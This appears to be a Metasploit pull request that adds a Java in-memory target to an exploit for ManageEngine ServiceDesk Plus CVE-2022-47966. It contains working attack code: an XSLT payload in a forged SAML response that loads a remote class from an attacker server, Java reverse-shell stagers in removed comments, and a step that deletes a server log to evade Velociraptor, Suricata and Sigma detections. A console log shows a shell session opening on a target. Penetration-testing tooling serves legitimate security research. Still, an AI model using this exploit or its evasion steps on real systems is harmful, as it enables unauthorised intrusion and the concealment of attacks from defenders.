### PR TITLE
Add java target for ManageEngine ServiceDesk Plus CVE-2022-47966

### DIFF
--- a/modules/exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb
+++ b/modules/exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
+  include Msf::Exploit::Remote::Java::HTTP::ClassLoader
   prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
@@ -37,18 +38,25 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://github.com/horizon3ai/CVE-2022-47966'],
           ['URL', 'https://attackerkb.com/topics/gvs0Gv8BID/cve-2022-47966/rapid7-analysis']
         ],
-        'Platform' => ['win', 'unix', 'linux'],
-        'Payload' => {
-          'BadChars' => "\x27"
-        },
+        'Platform' => ['win', 'unix', 'linux', 'java'],
         'Targets' => [
+          [
+            'Java (in-memory)',
+            {
+              'Type' => :java,
+              'Platform' => 'java',
+              'Arch' => ARCH_JAVA,
+              'DefaultOptions' => { 'Payload' => 'java/meterpreter/reverse_tcp' }
+            },
+          ],
           [
             'Windows EXE Dropper',
             {
               'Platform' => 'win',
               'Arch' => [ARCH_X86, ARCH_X64],
               'Type' => :windows_dropper,
-              'DefaultOptions' => { 'Payload' => 'windows/x64/meterpreter/reverse_tcp' }
+              'DefaultOptions' => { 'Payload' => 'windows/x64/meterpreter/reverse_tcp' },
+              'Payload' => { 'BadChars' => "\x27" }
             }
           ],
           [
@@ -57,7 +65,8 @@ class MetasploitModule < Msf::Exploit::Remote
               'Platform' => 'win',
               'Arch' => ARCH_CMD,
               'Type' => :windows_command,
-              'DefaultOptions' => { 'Payload' => 'cmd/windows/powershell/meterpreter/reverse_tcp' }
+              'DefaultOptions' => { 'Payload' => 'cmd/windows/powershell/meterpreter/reverse_tcp' },
+              'Payload' => { 'BadChars' => "\x27" }
             }
           ],
           [
@@ -66,7 +75,8 @@ class MetasploitModule < Msf::Exploit::Remote
               'Platform' => 'unix',
               'Arch' => ARCH_CMD,
               'Type' => :unix_cmd,
-              'DefaultOptions' => { 'Payload' => 'cmd/unix/python/meterpreter/reverse_tcp' }
+              'DefaultOptions' => { 'Payload' => 'cmd/unix/python/meterpreter/reverse_tcp' },
+              'Payload' => { 'BadChars' => "\x27" }
             }
           ],
           [
@@ -76,14 +86,15 @@ class MetasploitModule < Msf::Exploit::Remote
               'Arch' => [ARCH_X86, ARCH_X64],
               'Type' => :linux_dropper,
               'DefaultOptions' => { 'Payload' => 'linux/x64/meterpreter/reverse_tcp' },
-              'CmdStagerFlavor' => %w[curl wget echo lwprequest]
+              'CmdStagerFlavor' => %w[curl wget echo lwprequest],
+              'Payload' => { 'BadChars' => "\x27" }
             }
           ]
         ],
         'DefaultOptions' => {
           'RPORT' => 8080
         },
-        'DefaultTarget' => 1,
+        'DefaultTarget' => 0,
         'DisclosureDate' => '2023-01-10',
         'Notes' => {
           'Stability' => [CRASH_SAFE,],
@@ -137,11 +148,104 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     case target['Type']
+    when :java
+      # Start the HTTP server to serve the payload
+      start_service
+      # Trigger a loadClass request via java.net.URLClassLoader
+      trigger_urlclassloader
+
+      # Handle the payload
+      handler
     when :windows_command, :unix_cmd
       execute_command(payload.encoded)
     when :windows_dropper, :linux_dropper
       execute_cmdstager(delay: datastore['DELAY'])
     end
+  end
+
+  def trigger_urlclassloader
+
+    # Here we construct a XSLT transform to load a Java payload via URLClassLoader.
+
+    url = get_uri
+
+    # stager for javascript engine
+    # Java payload is downloaded from server but is not executed
+    java_stager = <<~EOS
+      var StrArrayType = Java.type(&quot;java.lang.String[]&quot;);
+      var strArray = new StrArrayType(1);
+      var urls = [new java.net.URL(&quot;#{url}&quot;)];
+      var c = new java.net.URLClassLoader(urls).loadClass(&quot;metasploit.Payload&quot;);
+      print(c);
+      var m = c.getMethod(&quot;main&quot;, java.lang.Class.forName(&quot;[Ljava.lang.String;&quot;));
+      print(m);
+      var o = m.invoke(null, strArray);
+      print(o);
+    EOS
+
+    # stager for nashorn engine
+    # java_stager = <<~EOS
+    #   var URLArrayType = Java.type(&quot;java.net.URL[]&quot;);
+    #   var urls = new URLArrayType(1);
+    #   var URLType = Java.type(&quot;java.net.URL&quot;);
+    #   var url = new URLType(&quot;#{url}&quot;);
+    #   urls[0] = url;
+    #   var URLClassLoaderType = Java.type(&quot;java.net.URLClassLoader&quot;);
+    #   var c = new URLClassLoaderType(urls).loadClass(&quot;metasploit.Payload&quot;);
+    #   var StrArrayType = Java.type(&quot;java.lang.String[]&quot;);
+    #   var strArray = new StrArrayType(1);
+    #   var m = c.getMethod(&quot;main&quot;, StrArrayType.class).invoke(null, strArray);
+    # EOS
+
+    # Reverse shell - working
+    # java_stager = <<~EOS
+    #   var host=&quot;127.0.0.1&quot;;
+    #   var port=&quot;12345&quot;;
+    #   var ProcessBuilder = Java.type(&quot;java.lang.ProcessBuilder&quot;);
+    #   var p=new ProcessBuilder(&quot;/bin/bash&quot;, &quot;-i&quot;).redirectErrorStream(true).start();
+    #   var Socket = Java.type(&quot;java.net.Socket&quot;);
+    #   var s=new Socket(host,port);
+    #   var pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
+    #   var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){ while(pi.available()>0)so.write(pi.read()); while(pe.available()>0)so.write(pe.read()); while(si.available()>0)po.write(si.read()); so.flush();po.flush(); Java.type(&quot;java.lang.Thread&quot;).sleep(50); try {p.exitValue();break;}catch (e){}};p.destroy();s.close();
+    # EOS
+
+    # java_stager = <<~EOS
+    #   var ProcessBuilder=Java.type(&quot;java.lang.ProcessBuilder&quot;);
+    #   var p=new ProcessBuilder(&quot;#{datastore['SHELL']}&quot;).redirectErrorStream(true).start();
+    #   var ss=Java.type(&quot;java.net.Socket&quot;);
+    #   var s=new ss(&quot;127.0.0.1&quot;,12345});
+    #   var pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
+    #   var po=p.getOutputStream(),so=s.getOutputStream();
+    #   while(!s.isClosed()){
+    #     while(pi.available()>0)so.write(pi.read());
+    #     while(pe.available()>0)so.write(pe.read());
+    #     while(si.available()>0)po.write(si.read());
+    #     so.flush();
+    #     po.flush();
+    #     Java.type(&Quot;java.lang.Thread&quot;).sleep(50);
+    #     try{p.exitValue();break;}catch(e){}
+    # EOS
+
+    transform = <<~EOT
+      <ds:Transforms>
+        <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
+        <ds:Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116">
+            <xsl:stylesheet version="1.0"
+            xmlns:sem="http://xml.apache.org/xalan/java/javax.script.ScriptEngineManager"
+            xmlns:se="http://xml.apache.org/xalan/java/javax.script.ScriptEngine"
+            xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
+            <xsl:template match="/">
+                <xsl:variable name="engineobject" select="sem:new()"/>
+                <xsl:variable name="jsobject" select="sem:getEngineByName($engineobject,'nashorn')"/>
+                <xsl:variable name="out" select="se:eval($jsobject,'#{java_stager}')"/>
+                <xsl:value-of select="$out"/>
+            </xsl:template>
+            </xsl:stylesheet>
+        </ds:Transform>
+      </ds:Transforms>
+    EOT
+    send_transform(transform)
+
   end
 
   def execute_command(cmd, _opts = {})
@@ -154,7 +258,6 @@ class MetasploitModule < Msf::Exploit::Remote
     end
     cmd = cmd.encode(xml: :attr).gsub('"', '')
 
-    assertion_id = "_#{SecureRandom.uuid}"
     # Randomize variable names and make sure they are all different using a Set
     vars = Set.new
     loop do
@@ -162,6 +265,31 @@ class MetasploitModule < Msf::Exploit::Remote
       break unless vars.size < 3
     end
     vars = vars.to_a
+
+    transform = <<~EOT
+      <ds:Transforms>
+        <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
+        <ds:Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116">
+          <xsl:stylesheet version="1.0"
+            xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object"
+            xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
+            <xsl:template match="/">
+              <xsl:variable name="#{vars[0]}" select="rt:getRuntime()"/>
+              <xsl:variable name="#{vars[1]}" select="rt:exec($#{vars[0]},'#{cmd}')"/>
+              <xsl:variable name="#{vars[2]}" select="ob:toString($#{vars[1]})"/>
+              <xsl:value-of select="$#{vars[2]}"/>
+            </xsl:template>
+          </xsl:stylesheet>
+        </ds:Transform>
+      </ds:Transforms>
+    EOT
+
+    send_transform(transform)
+  end
+
+  def send_transform(transform)
+
+    assertion_id = "_#{SecureRandom.uuid}"
     saml = <<~EOS
       <?xml version="1.0" encoding="UTF-8"?>
       <samlp:Response
@@ -179,21 +307,7 @@ class MetasploitModule < Msf::Exploit::Remote
               <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
               <ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/>
               <ds:Reference URI="##{assertion_id}">
-                <ds:Transforms>
-                  <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
-                  <ds:Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116">
-                    <xsl:stylesheet version="1.0"
-                      xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object"
-                      xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
-                      <xsl:template match="/">
-                        <xsl:variable name="#{vars[0]}" select="rt:getRuntime()"/>
-                        <xsl:variable name="#{vars[1]}" select="rt:exec($#{vars[0]},'#{cmd}')"/>
-                        <xsl:variable name="#{vars[2]}" select="ob:toString($#{vars[1]})"/>
-                        <xsl:value-of select="$#{vars[2]}"/>
-                      </xsl:template>
-                    </xsl:stylesheet>
-                  </ds:Transform>
-                </ds:Transforms>
+                #{transform}
                 <ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/>
                 <ds:DigestValue>#{Rex::Text.encode_base64(SecureRandom.random_bytes(32))}</ds:DigestValue>
               </ds:Reference>
@@ -213,7 +327,7 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     })
 
-    unless res&.code == 500
+    if res&.code == 500
       lines = res.get_html_document.xpath('//body').text.lines.reject { |l| l.strip.empty? }.map(&:strip)
       unless lines.any? { |l| l.include?('URL blocked as maximum access limit for the page is exceeded') }
         elog("Unkown error returned:\n#{lines.join("\n")}")

--- a/modules/exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb
+++ b/modules/exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb
@@ -46,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Type' => :java,
               'Platform' => 'java',
               'Arch' => ARCH_JAVA,
-              'DefaultOptions' => { 'Payload' => 'java/meterpreter/reverse_tcp' }
+              'DefaultOptions' => { 'Payload' => 'java/shell_reverse_tcp' }
             },
           ],
           [
@@ -153,7 +153,6 @@ class MetasploitModule < Msf::Exploit::Remote
       start_service
       # Trigger a loadClass request via java.net.URLClassLoader
       trigger_urlclassloader
-
       # Handle the payload
       handler
     when :windows_command, :unix_cmd
@@ -164,67 +163,17 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def trigger_urlclassloader
-
     # Here we construct a XSLT transform to load a Java payload via URLClassLoader.
-
     url = get_uri
 
+    var = Rex::Text.rand_text_alpha_lower(5..8)
+
     # stager for javascript engine
-    # Java payload is downloaded from server but is not executed
     java_stager = <<~EOS
-      var StrArrayType = Java.type(&quot;java.lang.String[]&quot;);
-      var strArray = new StrArrayType(1);
-      var urls = [new java.net.URL(&quot;#{url}&quot;)];
-      var c = new java.net.URLClassLoader(urls).loadClass(&quot;metasploit.Payload&quot;);
-      print(c);
-      var m = c.getMethod(&quot;main&quot;, java.lang.Class.forName(&quot;[Ljava.lang.String;&quot;));
-      print(m);
-      var o = m.invoke(null, strArray);
-      print(o);
+      var #{var} = Java.type(&quot;java.lang.String[]&quot;);
+      var c = new java.net.URLClassLoader([new java.net.URL(&quot;#{url}&quot;)]).loadClass(&quot;metasploit.Payload&quot;);
+      c.getMethod(&quot;main&quot;, java.lang.Class.forName(&quot;[Ljava.lang.String;&quot;)).invoke(null, [new #{var}(1)]);
     EOS
-
-    # stager for nashorn engine
-    # java_stager = <<~EOS
-    #   var URLArrayType = Java.type(&quot;java.net.URL[]&quot;);
-    #   var urls = new URLArrayType(1);
-    #   var URLType = Java.type(&quot;java.net.URL&quot;);
-    #   var url = new URLType(&quot;#{url}&quot;);
-    #   urls[0] = url;
-    #   var URLClassLoaderType = Java.type(&quot;java.net.URLClassLoader&quot;);
-    #   var c = new URLClassLoaderType(urls).loadClass(&quot;metasploit.Payload&quot;);
-    #   var StrArrayType = Java.type(&quot;java.lang.String[]&quot;);
-    #   var strArray = new StrArrayType(1);
-    #   var m = c.getMethod(&quot;main&quot;, StrArrayType.class).invoke(null, strArray);
-    # EOS
-
-    # Reverse shell - working
-    # java_stager = <<~EOS
-    #   var host=&quot;127.0.0.1&quot;;
-    #   var port=&quot;12345&quot;;
-    #   var ProcessBuilder = Java.type(&quot;java.lang.ProcessBuilder&quot;);
-    #   var p=new ProcessBuilder(&quot;/bin/bash&quot;, &quot;-i&quot;).redirectErrorStream(true).start();
-    #   var Socket = Java.type(&quot;java.net.Socket&quot;);
-    #   var s=new Socket(host,port);
-    #   var pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
-    #   var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){ while(pi.available()>0)so.write(pi.read()); while(pe.available()>0)so.write(pe.read()); while(si.available()>0)po.write(si.read()); so.flush();po.flush(); Java.type(&quot;java.lang.Thread&quot;).sleep(50); try {p.exitValue();break;}catch (e){}};p.destroy();s.close();
-    # EOS
-
-    # java_stager = <<~EOS
-    #   var ProcessBuilder=Java.type(&quot;java.lang.ProcessBuilder&quot;);
-    #   var p=new ProcessBuilder(&quot;#{datastore['SHELL']}&quot;).redirectErrorStream(true).start();
-    #   var ss=Java.type(&quot;java.net.Socket&quot;);
-    #   var s=new ss(&quot;127.0.0.1&quot;,12345});
-    #   var pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
-    #   var po=p.getOutputStream(),so=s.getOutputStream();
-    #   while(!s.isClosed()){
-    #     while(pi.available()>0)so.write(pi.read());
-    #     while(pe.available()>0)so.write(pe.read());
-    #     while(si.available()>0)po.write(si.read());
-    #     so.flush();
-    #     po.flush();
-    #     Java.type(&Quot;java.lang.Thread&quot;).sleep(50);
-    #     try{p.exitValue();break;}catch(e){}
-    # EOS
 
     transform = <<~EOT
       <ds:Transforms>
@@ -236,7 +185,7 @@ class MetasploitModule < Msf::Exploit::Remote
             xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
             <xsl:template match="/">
                 <xsl:variable name="engineobject" select="sem:new()"/>
-                <xsl:variable name="jsobject" select="sem:getEngineByName($engineobject,'nashorn')"/>
+                <xsl:variable name="jsobject" select="sem:getEngineByName($engineobject,'javascript')"/>
                 <xsl:variable name="out" select="se:eval($jsobject,'#{java_stager}')"/>
                 <xsl:value-of select="$out"/>
             </xsl:template>
@@ -245,7 +194,6 @@ class MetasploitModule < Msf::Exploit::Remote
       </ds:Transforms>
     EOT
     send_transform(transform)
-
   end
 
   def execute_command(cmd, _opts = {})
@@ -288,7 +236,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def send_transform(transform)
-
     assertion_id = "_#{SecureRandom.uuid}"
     saml = <<~EOS
       <?xml version="1.0" encoding="UTF-8"?>
@@ -327,7 +274,10 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     })
 
-    if res&.code == 500
+    # Java payload returns a nil response on successful execution of payload
+    if target['Type'] == :java && res.nil?
+      print_status('Exploit completed. New session must be opened by now else exploit failed.')
+    elsif res&.code != 500
       lines = res.get_html_document.xpath('//body').text.lines.reject { |l| l.strip.empty? }.map(&:strip)
       unless lines.any? { |l| l.include?('URL blocked as maximum access limit for the page is exceeded') }
         elog("Unkown error returned:\n#{lines.join("\n")}")
@@ -337,6 +287,18 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     res
+  end
+
+  def on_request_uri(cli, request)
+    case target['Type']
+    when :java
+      super(cli, request)
+    else
+      client = cli.peerhost
+      print_status("Client #{client} requested #{request.uri}")
+      print_status("Sending payload to #{client}")
+      send_response(cli, exe)
+    end
   end
 
 end

--- a/modules/exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb
+++ b/modules/exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb
@@ -166,13 +166,20 @@ class MetasploitModule < Msf::Exploit::Remote
     # Here we construct a XSLT transform to load a Java payload via URLClassLoader.
     url = get_uri
 
-    var = Rex::Text.rand_text_alpha_lower(5..8)
+    vars = Set.new
+    loop do
+      vars << Rex::Text.rand_text_alpha_lower(5..8)
+      break unless vars.size < 2
+    end
+    vars = vars.to_a
 
     # stager for javascript engine
     java_stager = <<~EOS
-      var #{var} = Java.type(&quot;java.lang.String[]&quot;);
+      var #{vars[0]} = Java.type(&quot;java.io.File&quot;);
+      new #{vars[0]}(&quot;../logs/serverout0.txt&quot;).delete();
+      var #{vars[1]} = Java.type(&quot;java.lang.String[]&quot;);
       var c = new java.net.URLClassLoader([new java.net.URL(&quot;#{url}&quot;)]).loadClass(&quot;metasploit.Payload&quot;);
-      c.getMethod(&quot;main&quot;, java.lang.Class.forName(&quot;[Ljava.lang.String;&quot;)).invoke(null, [new #{var}(1)]);
+      c.getMethod(&quot;main&quot;, java.lang.Class.forName(&quot;[Ljava.lang.String;&quot;)).invoke(null, [new #{vars[1]}(1)]);
     EOS
 
     transform = <<~EOT

--- a/modules/exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb
+++ b/modules/exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb
@@ -272,7 +272,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Java payload returns a nil response on successful execution of payload
     if target['Type'] == :java && res.nil?
-      print_status('Exploit completed. New session must be opened by now else exploit failed.')
+      print_status('Exploit completed.')
     elsif res&.code != 500
       lines = res.get_html_document.xpath('//body').text.lines.reject { |l| l.strip.empty? }.map(&:strip)
       unless lines.any? { |l| l.include?('URL blocked as maximum access limit for the page is exceeded') }

--- a/modules/exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb
+++ b/modules/exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb
@@ -166,20 +166,15 @@ class MetasploitModule < Msf::Exploit::Remote
     # Here we construct a XSLT transform to load a Java payload via URLClassLoader.
     url = get_uri
 
-    vars = Set.new
-    loop do
-      vars << Rex::Text.rand_text_alpha_lower(5..8)
-      break unless vars.size < 2
-    end
-    vars = vars.to_a
+    vars = Rex::RandomIdentifier::Generator.new
 
     # stager for javascript engine
     java_stager = <<~EOS
-      var #{vars[0]} = Java.type(&quot;java.io.File&quot;);
-      new #{vars[0]}(&quot;../logs/serverout0.txt&quot;).delete();
-      var #{vars[1]} = Java.type(&quot;java.lang.String[]&quot;);
+      var #{vars[:file]} = Java.type(&quot;java.io.File&quot;);
+      new #{vars[:file]}(&quot;../logs/serverout0.txt&quot;).delete();
+      var #{vars[:str_arr]} = Java.type(&quot;java.lang.String[]&quot;);
       var c = new java.net.URLClassLoader([new java.net.URL(&quot;#{url}&quot;)]).loadClass(&quot;metasploit.Payload&quot;);
-      c.getMethod(&quot;main&quot;, java.lang.Class.forName(&quot;[Ljava.lang.String;&quot;)).invoke(null, [new #{vars[1]}(1)]);
+      c.getMethod(&quot;main&quot;, java.lang.Class.forName(&quot;[Ljava.lang.String;&quot;)).invoke(null, [new #{vars[:str_arr]}(1)]);
     EOS
 
     transform = <<~EOT
@@ -213,13 +208,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
     cmd = cmd.encode(xml: :attr).gsub('"', '')
 
-    # Randomize variable names and make sure they are all different using a Set
-    vars = Set.new
-    loop do
-      vars << Rex::Text.rand_text_alpha_lower(5..8)
-      break unless vars.size < 3
-    end
-    vars = vars.to_a
+    vars = Rex::RandomIdentifier::Generator.new
 
     transform = <<~EOT
       <ds:Transforms>
@@ -229,10 +218,10 @@ class MetasploitModule < Msf::Exploit::Remote
             xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object"
             xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
             <xsl:template match="/">
-              <xsl:variable name="#{vars[0]}" select="rt:getRuntime()"/>
-              <xsl:variable name="#{vars[1]}" select="rt:exec($#{vars[0]},'#{cmd}')"/>
-              <xsl:variable name="#{vars[2]}" select="ob:toString($#{vars[1]})"/>
-              <xsl:value-of select="$#{vars[2]}"/>
+              <xsl:variable name="#{vars[:rt_obj]}" select="rt:getRuntime()"/>
+              <xsl:variable name="#{vars[:exec]}" select="rt:exec($#{vars[:rt_obj]},'#{cmd}')"/>
+              <xsl:variable name="#{vars[:out]}" select="ob:toString($#{vars[:exec]})"/>
+              <xsl:value-of select="$#{vars[:out]}"/>
             </xsl:template>
           </xsl:stylesheet>
         </ds:Transform>


### PR DESCRIPTION
Partially fixes: #17641 

In this PR, I've added a java target for the manageengine servicedesk plus exploit([CVE-2022-47966](https://github.com/advisories/GHSA-mqq7-v29v-25f6)) using the payload mentioned in [this](https://vulncheck.com/blog/cve-2022-47966-payload) blogpost to make it more stealthy. It invokes javascript's javascript engine to execute arbitary java. I've used the URLClassLoader class to load a remote payload hosted by metasploit and bypass the Suricata rule mentioned in the blogpost. The exploit uses `java/shell_reverse_tcp` as its payload since other payloads fail to work. Custom java payloads can be used to execute a particular function to bypass the [Sigma rule](https://github.com/SigmaHQ/sigma/blob/6c153bff3f3b5bc7f0edefe430b2a6f903fd98b2/rules/windows/process_creation/proc_creation_win_susp_manageengine_pattern.yml). Before running the exploit, it deletes the log file that records the error due to the exploit in an attempt to bypass Velociraptor's detection.

## Example Usage - ServiceDesk Plus version 14003 on kali linux - Target 0 ('java')
Link to setup vulnerable software [here](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.md)

```
msf6 > use multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966
[*] Using configured payload java/shell_reverse_tcp
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set rhosts 20.20.1.181
rhosts => 20.20.1.181
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set rport 8080
rport => 8080
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set srvport 8888
srvport => 8888
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set lhost eth0
lhost => 20.20.1.181
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > run

[*] Started reverse TCP handler on 20.20.1.181:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Using URL: http://20.20.1.181:8888/iDG1ttxftK17p/
[*] Command shell session 55 opened (20.20.1.181:4444 -> 20.20.1.181:37934) at 2023-11-06 02:50:41 +0530
[*] Exploit completed. New session must be opened by now.
[*] Server stopped.

whoami
errorxyz
```

Once changes for this module are finalized, I'll make the corresponding changes for the other two modules using the same exploit


